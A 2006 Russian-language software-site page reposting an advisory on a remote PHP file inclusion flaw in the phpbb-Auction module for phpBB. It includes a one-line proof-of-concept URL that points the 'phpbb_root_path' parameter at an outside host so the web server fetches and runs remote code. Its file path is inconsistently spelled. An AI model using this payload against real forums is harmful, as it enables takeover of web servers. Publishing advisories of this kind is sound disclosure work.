Новый софт   
  
  rss :  про сайт :  стартовой :  избранное :  скачать файлы :  опросы   
  фото приколы :  видео и ссылки :  телефоны и смартфоны :  новости :  безопасность :  обзоры программ :  наука и технологии :  все интересное 
расширенный поиск  
 
:

:

Новый пользователь
Потеряли ваш пароль?
 

 


 
Soft навколо
WareZebra.com
Заказ файлов в UA-IX!
Игровой портал
Новый Софт
mobime.ru
Soft Page
 
График Вашей работы?
Полная занятость
Частичная занятость
Временная занятость
Не работаю
Результаты
853 голосов | 0 Комментарии
 
Гости: 7
 
КОММЕНТАРИИ за 2 дня
Нет новых комментариев
 








 Новый софт - PHP-инклюдинг в phpBB phpbb-Auction

Тостер beko с гарантией от компании Маллстрит

PHP-инклюдинг в phpBB phpbb-Auction

    

05/04/06 2006 @ 11:18 AM EEST
Новый софт - Скачать программы, exe файлы, бизнес новости, скачать игры, технологии взлома и защиты, qip, icq

Программа: phpbb-Auction (модуль для phpBB) 1.3m, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии "auction/auction_common.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:
http://[target]/[path]/autionauction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

URL производителя: www.phpbb-auction.com

Решение: Способов устранения уязвимости не существует в настоящее время.

===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================

Vuln. Description:

This flaw is due to an input validation error in the "autionauction_common.php"(line 26)
that does not validate the "$phpbb_root_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/autionauction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

===================================
have a good time all my friends
===================================
 
PHP-инклюдинг в phpBB phpbb-Auction | 0 Комментарии | Создать учётную запись
Следующие комментарии принадлежат тем, кто их опубликовал. Этот сайт не несёт ответственности за содержание комментариев.
RedTram
 Копирайт © 2010 Новый софт
 Все торговые марки и копирайты на этой странице являются собственностью соответствующих хозяев.
 Для связи с администрацией сайта, телефон в Киеве 5927467, ICQ 5714034
 Новый софт - Скачать программы, exe файлы, бизнес новости, скачать игры, технологии взлома и защиты, qip, icq 		Работает на Geeklog 
Страница создана за 0.06 секунд